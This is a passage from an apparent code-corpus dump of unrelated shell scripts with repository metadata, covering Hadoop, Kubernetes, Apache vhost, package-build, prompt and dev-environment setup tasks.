${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode -bootstrapStandby -force
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode
echo "StandBy NameNode started!"
fi
if [[ ! -z "${IS_ACTIVE_NODE}" ]]; then
if [ "`ls -A $namedir`" == "" ]; then
echo "Formatting namenode name directory: $namedir"
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode -format ${CLUSTER_NAME} -force -nonInteractive
fi
echo "Formatiting and starting failover controller"
${HADOOP_PREFIX}/bin/hdfs zkfc -formatZK -force -nonInteractive
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} --daemon start zkfc
echo "Starting Active NameNode..."
${HADOOP_PREFIX}/bin/hdfs --config ${HADOOP_CONF_DIR} namenode
echo "Active NameNode started!"
fi
if [[ -z "${IS_STANDBY_NODE}" ]] && [[ -z "${IS_ACTIVE_NODE}" ]]; then
echo "either IS_ACTIVE_NODE or IS_STANDBY_NODE env variable must be provided to identify NameNode state"
exit 2
fi
| true
|
d568e09b95eec39005a54faa8d61f49d4e026779
|
Shell
|
MenkeTechnologies/zpwr
|
/autoload/common/zpwrFzfDirSearch
|
UTF-8
| 385
| 2.71875
| 3
|
[
"MIT"
] |
permissive
|
# -*- mode: sh -*-
# vim: set ft=sh:
# Interactive directory picker: list directories (and symlinks) under the
# current directory — pruning pseudo-filesystems — strip the leading "./"
# (cut -c3-), and hand the list to fzf via $ZPWR_FZF with $FZF_CTRL_T_OPTS.
function zpwrFzfDirSearch(){
# NOTE(review): '-path "*/\\.*"' matches a literal backslash before the dot,
# not hidden paths ('*/.*') — confirm which was intended before changing.
command find -L . -mindepth 1 \
\( -path '*/\\.*' -o -fstype 'sysfs' \
-o -fstype 'devfs' -o -fstype 'devtmpfs' \
-o -fstype 'proc' \) -prune -o -type d -print \
-o -type l -print 2> /dev/null | cut -c3- |
eval "$ZPWR_FZF --border $FZF_CTRL_T_OPTS"
}
zpwrFzfDirSearch "$@"
| true
|
f6961216cbc6ffde43ae8574743b87ca4bda5757
|
Shell
|
win-builds/slackware64-current
|
/l/cairo/cairo.SlackBuild
|
UTF-8
| 3,704
| 3.265625
| 3
|
[] |
no_license
|
#!/bin/sh
# Copyright 2008, 2009, 2010, 2011, 2013 Patrick J. Volkerding, Sebeka, MN, USA
# All rights reserved.
#
# Redistribution and use of this script, with or without modification, is
# permitted provided that the following conditions are met:
#
# 1. Redistributions of this script must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
PKGNAM=cairo
VERSION=${VERSION:-$(echo $PKGNAM-*.tar.?z* | rev | cut -f 3- -d . | cut -f 1 -d - | rev)}
BUILD=${BUILD:-1}
# Automatically determine the architecture we're building on:
if [ -z "$ARCH" ]; then
case "$( uname -m )" in
i?86) export ARCH=i486 ;;
arm*) export ARCH=arm ;;
# Unless $ARCH is already set, use uname -m for all other archs:
*) export ARCH=$( uname -m ) ;;
esac
fi
NUMJOBS=${NUMJOBS:-" -j7 "}
CWD=$(pwd)
TMP=${TMP:-/tmp}
PKG=$TMP/package-$PKGNAM
rm -rf $PKG
mkdir -p $TMP $PKG
cd $TMP
rm -rf $PKGNAM-$VERSION
tar xvf $CWD/$PKGNAM-$VERSION.tar.?z* || exit 1
cd $PKGNAM-$VERSION
chown -R root:root .
chmod -R u+w,go+r-w,a-s .
CFLAGS="-O2" \
LDFLAGS="-L/${PREFIX}/lib${LIBDIRSUFFIX}" \
./configure \
--prefix=/${PREFIX} \
--libdir=/${PREFIX}/lib${LIBDIRSUFFIX} \
--mandir=/${PREFIX}/man \
--sysconfdir=/etc \
--disable-xlib \
--disable-gtk-doc \
--disable-quartz \
--disable-static \
--disable-trace \
--enable-ps \
--enable-pdf \
--enable-svg \
--enable-ft \
--enable-gobject \
--host=${HOST_TRIPLET} \
--build=$ARCH-slackware-linux
# None of these are 'stable' yet...
# --enable-qt \
# --enable-drm \
# Not sure if these two are needed / useful yet; --enable-xcb is now default
# --enable-xcb-shm \
# ^^ may cause GTK+3 instability
# --enable-xlib-xcb \
# ^^ this one caused a GIMP slowdown
# Skipping this, because it causes a dependency on the specific
# version of binutils installed at compile time:
# --enable-trace
make $NUMJOBS || make || exit 1
make install DESTDIR=$PKG
find $PKG | xargs file | egrep -e "executable|shared object" \
| grep ${HOST_EXE_FORMAT} | cut -f 1 -d : \
| xargs ${HOST_STRIP} --strip-unneeded 2> /dev/null
mkdir -p $PKG/${PREFIX}/doc/$PKGNAM-$VERSION
cp -a \
AUTHORS BIBLIOGRAPHY BUGS CODING_STYLE COPYING* HACKING NEWS PORTING_GUIDE README RELEASING \
$PKG/${PREFIX}/doc/$PKGNAM-$VERSION
( cd $PKG/${PREFIX}/doc/$PKGNAM-$VERSION ; ln -sf /${PREFIX}/share/gtk-doc/html/cairo html )
ln -sf ../share/gtk-doc/html/cairo $PKG/${PREFIX}/doc/$PKGNAM-$VERSION/html
# We do not need the entire NEWS file.
if [ -r NEWS ]; then
DOCSDIR=$(echo $PKG/${PREFIX}/doc/*-$VERSION)
cat NEWS | head -n 1000 > $DOCSDIR/NEWS
touch -r NEWS $DOCSDIR/NEWS
fi
cat ${CWD}/$PKGNAM.yypkg.script | sed \
-e "s/%{PKG}/$PKGNAM/" \
-e "s/%{HST}/${HOST_TRIPLET}/" \
-e "s/%{TGT}//" \
-e "s/%{VER}/${VERSION}/" \
-e "s/%{BUILD}/${BUILD}/" \
-e "s/%{DESCR}/${DESCR:-"No description"}/" \
| yypkg --makepkg --output ${YYOUTPUT} --script - --directory "${PKG}/${PREFIX}"
| true
|
fddb0ea73ded215c1c48c03b97cded9bb66c3254
|
Shell
|
gisikw/.dotfiles
|
/shell/prompt.sh
|
UTF-8
| 837
| 3.59375
| 4
|
[] |
no_license
|
# Translate an ANSI color code (31/32/33/36) into its color name.
# Any other code maps to "default". Result is written to stdout.
get_named_color() {
  local code="$1"
  local color_name
  case "$code" in
    31) color_name="red" ;;
    32) color_name="green" ;;
    33) color_name="yellow" ;;
    36) color_name="cyan" ;;
    *)  color_name="default" ;;
  esac
  echo "$color_name"
}
function status_prompt() {
# Build the shell prompt in $PROMPT, colored by the last command's status
# and the git working-tree state: red if the previous command failed,
# yellow if the tree is dirty, green if clean. Must run first in the
# prompt hook so $? still holds the last command's status.
if [ $? -ne 0 ]; then
STATUS="red"
else
[ $(git status --porcelain=1 2>/dev/null | wc -l) -ne 0 ] && STATUS="yellow" || STATUS="green"
fi
# One git call prints the repo toplevel then the branch; read them line by line.
# NOTE(review): "{ read GROOT; read BRANCH }" without a ';' before '}' is
# zsh syntax — in bash the '}' would be passed to read. Consistent with the
# ZSH_NAME dispatch later in this file, but confirm the bash path is unused.
{ read GROOT; read BRANCH } < <(git rev-parse --show-toplevel --abbrev-ref HEAD 2>/dev/null)
LOCATION="$HOST"
[ ! -z "$GROOT" ] && LOCATION="$LOCATION/$(basename $GROOT)"
# Append "#branch" only for non-default branches.
[ ! -z "$BRANCH" ] && [ "$BRANCH" != "master" ] && [ "$BRANCH" != "main" ] && LOCATION="$LOCATION#$BRANCH"
NEWLINE=$'\n'
# %K/%F/%k/%f are zsh prompt color escapes: black text on a STATUS-colored
# background, then a powerline-style cap and a second line for input.
PROMPT="%K{$STATUS}%F{black} $LOCATION %F{$STATUS}%k${NEWLINE}%K{$STATUS}%k%f "
}
if [[ $ZSH_NAME ]]; then
precmd() { status_prompt; }
else
PROMPT_COMMAND=status_prompt
fi
| true
|
842aec09c8a3183b9df6241c612b3655dcb54f65
|
Shell
|
Youhana-Hana/Infra-java-prevayler-K8S
|
/02-deploy-app/k8s/app/deploy
|
UTF-8
| 646
| 2.8125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
set -e
# deploy app deployment and service
kubectl apply -f deployment/web-app.yml
# deploy app deployment and service
kubectl apply -f deployment/web-static.yml
# smoke test to list all pods, deployments and services
kubectl get pod,deploy,svc
echo -e "Waiting for company-news app ELB to be created (60 seconds)\n"
sleep 60
echo -e "Copy the given loadbalancer URL into the browser\n"
kubectl get svc/company-news-service --template="{{range .status.loadBalancer.ingress}} {{.hostname}} {{end}}"
echo -e "\n"
kubectl get svc/company-news-static-service --template="{{range .status.loadBalancer.ingress}} {{.hostname}} {{end}}"
| true
|
6d00704ff508d674e01bb67e8a4b595a7be26353
|
Shell
|
WeiXiLong/Linux
|
/5_1/cal_pi.sh
|
UTF-8
| 296
| 3.453125
| 3
|
[] |
no_license
|
#!/bin/bash
echo -e "This program will calculate pi value.\n"
echo -e "You should input a float number to calculate pi value. \n"
read -p "The scale number (10 ~ 10000)? " checking
num=${checking:-"10"}
echo -e "Starting calcuate pi value. Be patient."
time echo "scale=$num; 4*a(1)" | bc -lq
| true
|
b465c9ef80e195288bfcb85af90fc39efa695639
|
Shell
|
CodingLappen/scripts
|
/watchdo
|
UTF-8
| 1,337
| 3.4375
| 3
|
[] |
no_license
|
#!/bin/bash
# Watch dir, may contain spaces:
watchdir="/home/tom/Downloads"
# move file to a subdirectory? if Commented out, it'll removed remove
# the torrent file.
# Note: Don't put a '/' before the path!
#movesubdir="added/"
dwdir="/home/tom/torrent"
trdonesscript=""
# Authentication "username:password":
#tr_auth="admin:admin"
# Transmission host "ip:port":
# tr_host="127.0.0.1:9091"
# Verbose?
verbose=1
#############################################
time=$(date "+%Y-%m-%d (%H:%M:%S)")
if [ -n "$tr_auth" ]; then
tr_auth="--auth $tr_auth"
fi
#############################################
if [ -n "$trdonescript" ]; then
trdonescript="--torrent-done-script $trdonescript"
fi
#############################################
if [ -n "$dwdir" ]; then
dwdir="--download-dir $dwdir"
fi
#############################################
#############################################j
echo "$dwdir"
echo "$watchdir"/*.torrent | sed "s/ /\n/g"
# for debugging
for file in "$watchdir"/*.torrent
do
if [ -f "$file" ]; then
if [ -n "$verbose" ]; then echo "$time: $file added to queue."; fi
/usr/bin/transmission-remote --add "$file"
# give the remote some time to process
sleep 5
else
if [ -n "$verbose" ]; then echo "$time: No torrent in $watchdir."; fi
fi
done
exit 0
| true
|
8b4077a1658cabdcf6d7ba6d939cbcf56e8e1e5e
|
Shell
|
bruriwijayanto/mkvhost
|
/mkvhost
|
UTF-8
| 2,804
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash
hostspath="/etc/hosts"
hostspathbck="/etc/myhost"
vhostdir="/etc/"
#cat $hostspath > $hostspathbck
function interactive()
{
echo ""
echo "## virtualhost wizard ##"
echo "## untuk keperluan local development ##"
echo "## bruri@gi.co.id ##"
echo ""
echo -n "Host : "
read host
echo -n "Direktori web : "
read webdir
echo ""
addhost $host $webdir
echo " ... $host sudah mengarah ke $webdir"
echo ""
#cat $hostspath
}
function addhost()
{
# add host
sudo echo "127.0.0.1 $1" >> $hostspath;
#add virtualhost config
cat > "/etc/apache2/sites-available/$1.conf" <<EOL
<VirtualHost *:80>
ServerName $1
#ServerAlias www.$1
DocumentRoot $2
#ErrorLog ${APACHE_LOG_DIR}/error.log
#CustomLog ${APACHE_LOG_DIR}/access.log combined
<Directory $2 >
Options Indexes FollowSymLinks MultiViews
AllowOverride all
Options -Indexes
Order allow,deny
allow from all
</Directory>
</VirtualHost>
EOL
#activate and restart
echo ":: Activate vhost"
sudo a2ensite $1
echo " ... activate successfully"
sudo service apache2 restart
echo ""
echo ":: Adding complete "
}
function delhost(){
if [ -z $1 ]; then
echo "nama host belum diisi"
else
str='/'$1'/d'
x=`sed $str $hostspath`
echo "$x" > $hostspath
echo ":: Deactivate vhost"
sudo a2dissite $1
echo " ... Deactivate successfully"
echo " ... Delete Configuration"
sudo rm "/etc/apache2/sites-available/$1"
echo " ... Configuration deleted"
sudo service apache2 restart
echo ""
echo ":: Delete Complete"
fi
}
function test(){
echo "testa"
}
function backup(){
cat /etc/hosts >> /etc/myhost
echo ":: hosts backup successfuly"
}
function restore(){
cat /etc/myhost >> /etc/hosts
echo ":: hosts restore successfuly"
}
function install(){
cp "$0" /usr/bin
echo ":: install mkvhost successfuly"
}
function selfdelete(){
rm -- "$0"
}
clear
if [ $1 = "install" ]; then
install
fi
if [ $1 = "-i" ]; then
interactive
fi
if [ $1 = "-b" ]; then
backup
fi
if [ $1 = "-r" ]; then
restore
fi
if [ $1 = "-d" ]; then
delhost $2
fi
if [ $1 = "-t" ]; then
test $2 $3
fi
if [ $1 = "-v" ]; then
echo "$hostspath : "
echo ""
cat $hostspath
echo ""
fi
if [ $1 = "--help" ]; then
cat <<EOL
Penggunaan: mkvhost [OPTION]
Tool bantuan untuk membuat virtualhost.
Mandatory arguments
-i Mode interaktif
-v Melihat host yang sudah dibuat
-d menghapus virtualhost contoh : -d sapi.com
-b backup file /etc/hosts
-r restore file /etc/hosts
--help menampilkan bantuan
install install ke /usr/bin
Report mkvhost bugs to bruri@gi.co.id
GNU coreutils home page: <http://www.gnu.org/software/coreutils/>
General help using GNU software: <http://www.gnu.org/gethelp/>
EOL
fi
| true
|
b2c48f51c5bf4d181e35b029bad02be7a4a764ec
|
Shell
|
bcowgill/bsac-linux-cfg
|
/bin/filter-videos.sh
|
UTF-8
| 1,198
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# BSACKIT Part of Brent S.A. Cowgill's Developer Toolkit
# WINDEV tool useful on windows development machine
GREP="egrep -i"
function usage {
local code
code=$1
cmd=$(basename $0)
echo "
$cmd [--regex] [--help|--man|-?]
This will filter a list of file names looking for video, movie file extensions.
--regex Shows the regex used for matching video file extensions.
--man Shows help for this tool.
--help Shows help for this tool.
-? Shows help for this tool.
See also filter-mime-video.sh, filter-text.sh, filter-docs.sh, filter-zips.sh, filter-fonts.sh, filter-scripts.sh, filter-web.sh, filter-css.sh, filter-images.sh, filter-sounds.sh, classify.sh
See the online file extension database https://fileinfo.com/extension/srt
Example:
locate -i reunion | $cmd
"
exit $code
}
if [ "$1" == "--help" ]; then
usage 0
fi
if [ "$1" == "--man" ]; then
usage 0
fi
if [ "$1" == "-?" ]; then
usage 0
fi
if [ "$1" == "--regex" ]; then
GREP="echo"
fi
$GREP '\.(abc|as[fx]|avi|divx|fl[iv]|fxm|m2ts?|m4v|mkv|mng|mo[dv]|mp4|mp(e|g|eg)|og[mvx]|srt|swf|t[ps]|vcd|vdr|viv|vob|wmv|yuv)(:|"|\s*$)' # .asf .asx .avi .divx .fli .flv .m2t .m2ts .mod .mov .mpe .mpg .mpeg .ogm .ogv .ogx .tp .ts
| true
|
016322f7551d4f8d066c3033d1e24a60f4414d23
|
Shell
|
boydhako/MACOSX-scripts
|
/set_python.bash
|
UTF-8
| 335
| 3.671875
| 4
|
[] |
no_license
|
#!/bin/bash
function PYVERSIONS {
for pdir in $(echo $PATH | tr ":" "\n"); do
for bin in $(find $pdir -type f -iname "*python*" 2>/dev/null | egrep -e "python[[:digit:]].[[:digit:]]$"); do
version="$($bin -V| awk '{printf $NF}')"
printf "%s\n" "$version"
done
done
}
PYVERSIONS | sort -n -r | uniq | awk '{printf $0" "}'
| true
|
4926b3fef610479076dd7f9b855b97959ab288a6
|
Shell
|
CodelyTV/dotly
|
/scripts/core/dotfiles.sh
|
UTF-8
| 186
| 2.65625
| 3
|
[
"MIT"
] |
permissive
|
dotfiles::list_bash_files() {
grep "#!/usr/bin/env bash" "$DOTFILES_PATH"/{bin,scripts,shell} -R | awk -F':' '{print $1}'
find "$DOTLY_PATH"/{bin,scripts,shell} -type f -name "*.sh"
}
| true
|
952c2d3325ab6adbfa03264d8f826959c963235f
|
Shell
|
fsmiamoto/commitlint-hooks-example
|
/.githooks/commit-msg
|
UTF-8
| 157
| 2.546875
| 3
|
[] |
no_license
|
#!/bin/sh
#
# Verify the commit message with commitlint
#
# This script is given the name of the file containing the
# commit message
#
commitlint -e "$1"
| true
|
bae183d10376f3706615a1e4ee3bafd1dda8ce6b
|
Shell
|
30ge30ge/short_text_classification
|
/scripts/bigben_ctl.sh
|
UTF-8
| 2,961
| 3.625
| 4
|
[] |
no_license
|
#!/bin/sh
FENGYI_HOME=`pwd`
BIN=$FENGYI_HOME/bin
CONF=$FENGYI_HOME/conf
HADOOP_PREFIX=$FENGYI_HOME/lib/hadoop
HADOOP_HOME=$HADOOP_PREFIX
HADOOP_CONF_DIR=$HADOOP_HOME/conf
SERVICE="
configure
schedule
visited
collect
hdfs_writer
"
setclasspath()
{
if [ "$JAVA_HOME" = "" ] ; then
export JAVA_HOME=$FENGYI_HOME/lib/jdk
fi
# CLASSPATH initially contains $HADOOP_CONF_DIR
CLASSPATH="${HADOOP_CONF_DIR}"
if [ "$HADOOP_USER_CLASSPATH_FIRST" != "" ] && [ "$HADOOP_CLASSPATH" != "" ] ; then
CLASSPATH=${CLASSPATH}:${HADOOP_CLASSPATH}
fi
CLASSPATH=${CLASSPATH}:$JAVA_HOME/lib/tools.jar
# for developers, add Hadoop classes to CLASSPATH
if [ -d "$HADOOP_HOME/build/classes" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build/classes
fi
if [ -d "$HADOOP_HOME/build/webapps" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build
fi
if [ -d "$HADOOP_HOME/build/test/classes" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build/test/classes
fi
if [ -d "$HADOOP_HOME/build/tools" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME/build/tools
fi
# for releases, add core hadoop jar & webapps to CLASSPATH
if [ -e $HADOOP_PREFIX/share/hadoop/hadoop-core-* ]; then
# binary layout
if [ -d "$HADOOP_PREFIX/share/hadoop/webapps" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_PREFIX/share/hadoop
fi
for f in $HADOOP_PREFIX/share/hadoop/hadoop-core-*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
# add libs to CLASSPATH
for f in $HADOOP_PREFIX/share/hadoop/lib/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
for f in $HADOOP_PREFIX/share/hadoop/lib/jsp-2.1/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
else
# tarball layout
if [ -d "$HADOOP_HOME/webapps" ]; then
CLASSPATH=${CLASSPATH}:$HADOOP_HOME
fi
for f in $HADOOP_HOME/hadoop-core-*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
# add libs to CLASSPATH
for f in $HADOOP_HOME/lib/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
if [ -d "$HADOOP_HOME/build/ivy/lib/Hadoop/common" ]; then
for f in $HADOOP_HOME/build/ivy/lib/Hadoop/common/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
fi
for f in $HADOOP_HOME/lib/jsp-2.1/*.jar; do
CLASSPATH=${CLASSPATH}:$f;
done
fi
export CLASSPATH
export HADOOP_PREFIX
export HADOOP_HOME
export HADOOP_CONF_DIR
}
start()
{
setclasspath
for s in $SERVICE
do
$BIN/${s}_server -f $CONF/${s}-server.conf >$s.log 2>&1 &
done
}
stop()
{
for s in $SERVICE
do
pkill -9 ${s}_server
done
}
status()
{
for s in $SERVICE
do
ps -ef |grep ${s}_server | grep -v grep
done
}
case "$1" in
"start")
start
;;
"stop")
stop
;;
"status")
status
;;
*)
echo "$0 start|stop|status"
esac
| true
|
48b3f839ebf0d6aa48d7781bdf734e247ecb70fd
|
Shell
|
hebersonaguiar/kanboard
|
/docker-entrypoint.sh
|
UTF-8
| 1,173
| 3.640625
| 4
|
[] |
no_license
|
#!/bin/bash
set -e
help() {
echo "Usage: docker run -dti -e DB_DRIVER=VALUE -e DB_USERNAME=VALUE -e DB_PASSWORD=VALUE -e DB_HOSTNAME=VALUE -e DB_NAME=VALUE -v $(pwd)/kanboard:/var/www/htnl/kanboard container_name:tag" >&2
echo
echo " DB_DRIVER database driver "
echo " DB_USERNAME database username"
echo " DB_PASSWORD database password"
echo " DB_HOSTNAME database hostname"
echo " DB_NAME database name"
echo
exit 1
}
if [ ! -z "$DB_DRIVER" ] || [ ! -z "$DB_USERNAME" ] || [ ! -z "$DB_PASSWORD" ] || [ ! -z "$DB_HOSTNAME" ] || [ ! -z "$DB_NAME" ] ; then
#CHANGE VARIABLES
sed -i "s/DBDRIVER/$DB_DRIVER/g" /opt/kanboard/config.php
sed -i "s/DBUSERNAME/$DB_USERNAME/g" /opt/kanboard/config.php
sed -i "s/DBPASSWORD/$DB_PASSWORD/g" /opt/kanboard/config.php
sed -i "s/DBHOSTNAME/$DB_HOSTNAME/g" /opt/kanboard/config.php
sed -i "s/DBNAME/$DB_NAME/g" /opt/kanboard/config.php
cp -R /opt/kanboard /var/www/html
chown -R www-data. /var/www/html
chmod 0777 -R /var/www/html/kanboard
else
echo "Please enter the required data!"
help
fi
exec "$@"
| true
|
fc851210b12a6f8799671b1747dbf0fb7b23dc2e
|
Shell
|
hivesolutions/scudum
|
/system/lib/services/ipv4-static-route
|
UTF-8
| 1,602
| 3.828125
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
. /lib/lsb/init-functions
. ${IFCONFIG}
case "${TYPE}" in
("" | "network")
need_ip=1
need_gateway=1
;;
("default")
need_gateway=1
args="${args} default"
desc="default"
;;
("host")
need_ip=1
;;
("unreachable")
need_ip=1
args="${args} unreachable"
desc="unreachable "
;;
(*)
log_failure_msg "Unknown route type (${TYPE}) in ${IFCONFIG}, cannot continue."
exit 1
;;
esac
if [ -n "${need_ip}" ]; then
if [ -z "${IP}" ]; then
log_failure_msg "IP variable missing from ${IFCONFIG}, cannot continue."
exit 1
fi
if [ -z "${PREFIX}" ]; then
log_failure_msg "PREFIX variable missing from ${IFCONFIG}, cannot continue."
exit 1
fi
args="${args} ${IP}/${PREFIX}"
desc="${desc}${IP}/${PREFIX}"
fi
if [ -n "${need_gateway}" ]; then
if [ -z "${GATEWAY}" ]; then
log_failure_msg "GATEWAY variable missing from ${IFCONFIG}, cannot continue."
exit 1
fi
args="${args} via ${GATEWAY}"
fi
if [ -n "${SOURCE}" ]; then
args="${args} src ${SOURCE}"
fi
case "${2}" in
up)
log_info_msg "Adding '${desc}' route to the ${1} interface..."
ip route add ${args} dev ${1}
evaluate_retval
;;
down)
log_info_msg "Removing '${desc}' route from the ${1} interface..."
ip route del ${args} dev ${1}
evaluate_retval
;;
*)
echo "Usage: ${0} [interface] {up|down}"
exit 1
;;
esac
| true
|
2419b81a7f99868144a6f331ef1b4b54944311fe
|
Shell
|
hello-metropolis/quickstart
|
/infrastructure/shell/install-ingress.sh
|
UTF-8
| 853
| 2.671875
| 3
|
[] |
no_license
|
echo "Installing production ingress"
echo "> Generating"
echo "apiVersion: extensions/v1beta1
kind: Ingress
metadata:
name: hello-kubernetes-ingress
annotations:
kubernetes.io/ingress.class: nginx
nginx.ingress.kubernetes.io/proxy-buffer-size: \"16k\"
spec:
rules:
- host: $INGRESS_HOST
http:
paths:
- path: /api
backend:
serviceName: backend-$DEPLOYMENT_KEY-metropolis-quickstart-backend
servicePort: 80
- host: $INGRESS_HOST
http:
paths:
- backend: # default backend
serviceName: frontend-$DEPLOYMENT_KEY-metropolis-quickstart-frontend
servicePort: 80" > infrastructure/terraform/ingress.yaml
# echo "> Outputing"
# cat infrastructure/terraform/ingress.yaml
echo "> Applying"
kubectl apply -f infrastructure/terraform/ingress.yaml
echo "> Finished"
| true
|
cc418f0501668c1f8c3b7b86c48b73c2890470c3
|
Shell
|
vitojeng/ohara
|
/bin/start-service.sh
|
UTF-8
| 2,305
| 3.703125
| 4
|
[
"BSD-3-Clause",
"Apache-2.0",
"BSD-2-Clause",
"CDDL-1.1",
"CDDL-1.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Copyright 2019 is-land
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#----------[LOCATE PROJECT]----------#
SOURCE="${BASH_SOURCE[0]}"
BIN_DIR="$( dirname "$SOURCE" )"
while [ -h "$SOURCE" ]
do
SOURCE="$(readlink "$SOURCE")"
BIN_DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
done
BIN_DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
PROJECT_HOME="$(dirname "$BIN_DIR")"
service=$1
shift 1
ARGS=""
i=0
while [ -n "$1" ]
do
ARGS=$ARGS" "$1
i=$(($i+1))
shift
done
if [ "$service" == "manager" ]; then
cd "$PROJECT_HOME"
exec env NODE_ENV=production node ./start.js $ARGS
else
if [ "$service" == "configurator" ]; then
CLASS="oharastream.ohara.configurator.Configurator"
elif [ "$service" == "-v" ] || [ "$service" == "version" ] || [ "$service" == "-version" ]; then
CLASS="oharastream.ohara.common.util.VersionUtils"
elif [ "$service" == "help" ]; then
echo "Usage:"
echo "Option Description"
echo "----------- -----------"
echo "configurator Ohara Configurator provides the service "
echo " for user and Ohara Manager to use."
echo ""
echo "manager Running Ohara Manager. After run this command, you can "
echo " connect to http://\${HostName or IP}:5050 url by browser."
echo ""
echo "class name custom class which has main function"
echo ""
exit 1
elif [ "$service" == "" ]; then
echo "Usage: (configurator|manager|help) [<args>]"
exit 1
else
CLASS=$service
fi
#----------[EXECUTION]----------#
exec "$BIN_DIR/run_java.sh" $CLASS $ARGS
fi
| true
|
4b4c0071cbbecb7dfcde977d464b11003cfd3227
|
Shell
|
mitali-bhokare/springboot-k8s-mysql
|
/scripts/dockerBuildPushImage.sh
|
UTF-8
| 306
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash -xe
cd ..
DOCKER_REPO="mitali7692/intuit"
REPO_NAME_AND_TAG="${DOCKER_REPO}":$(date +"%H.%M.%S")
# Build app docker container
echo "The project version is ${REPO_NAME_AND_TAG}"
docker build -t "${REPO_NAME_AND_TAG}" .
# Push app container to docker hub
docker push "${REPO_NAME_AND_TAG}"
| true
|
7f36db90224d4c7524ab7b833d997d9b1d409a6b
|
Shell
|
OSGeo/gdal
|
/scripts/setdevenv.sh
|
UTF-8
| 2,169
| 3.796875
| 4
|
[
"MIT",
"LicenseRef-scancode-warranty-disclaimer",
"SunPro",
"LicenseRef-scancode-info-zip-2005-02",
"BSD-3-Clause",
"ISC",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
#
# This script set ups the environment variables needed for executing the
# GDAL build in this tree, without installing it.
# For a CMake build, the script should be run from the build directory
# typically if the build dir is a subdirectory in the source tree,
# ". ../scripts/setdevenv.sh"
#
# The script can be sourced from either bash or zsh.
# Do *NOT* use set set -e|-u flags as this script is intended to be sourced
# and thus an error emitted will kill the shell.
# set -eu
called=$_
if [[ $BASH_VERSION && $(realpath $called) == $(realpath "$0") ]]; then
echo "Script should be sourced with '. $0', instead of run."
exit 1
fi
# The following line uses a zsh expansion that is not supported by shellcheck
# shellcheck disable=SC2296
SETDEVENV_SH=${BASH_SOURCE[0]:-${(%):-%x}}
# SC2164 is "Use cd ... || exit in case cd fails"
# shellcheck disable=SC2164
GDAL_ROOT=$(cd $(dirname ${SETDEVENV_SH})/..; pwd)
CUR_DIR=$PWD
echo "Setting environment for a CMake build from ${CUR_DIR}..."
if [[ ! ${PATH} =~ $CUR_DIR/apps ]]; then
export PATH="$CUR_DIR/apps:$PATH"
export PATH="$CUR_DIR/perftests:$PATH"
export PATH="$GDAL_ROOT/swig/python/gdal-utils/scripts:$PATH"
echo "Setting PATH=$PATH"
fi
if [[ "$(uname -s)" == "Darwin" ]]; then
if [[ ! "${DYLD_LIBRARY_PATH}" =~ $CUR_DIR ]]; then
export DYLD_LIBRARY_PATH="$CUR_DIR:$DYLD_LIBRARY_PATH"
echo "Setting DYLD_LIBRARY_PATH=$DYLD_LIBRARY_PATH"
fi
else
if [[ ! "${LD_LIBRARY_PATH}" =~ $CUR_DIR ]]; then
export LD_LIBRARY_PATH="$CUR_DIR:$LD_LIBRARY_PATH"
echo "Setting LD_LIBRARY_PATH=$LD_LIBRARY_PATH"
fi
fi
if [[ ! ${GDAL_DRIVER_PATH} =~ $CUR_DIR/gdalplugins ]]; then
export GDAL_DRIVER_PATH="$CUR_DIR/gdalplugins"
echo "Setting GDAL_DRIVER_PATH=$GDAL_DRIVER_PATH"
fi
if [[ ! "${GDAL_DATA}" =~ $GDAL_ROOT/data ]]; then
export GDAL_DATA="$GDAL_ROOT/data"
echo "Setting GDAL_DATA=$GDAL_DATA"
fi
GDAL_PYTHONPATH="$CUR_DIR/swig/python"
if [[ ! "${PYTHONPATH}" =~ $GDAL_PYTHONPATH ]]; then
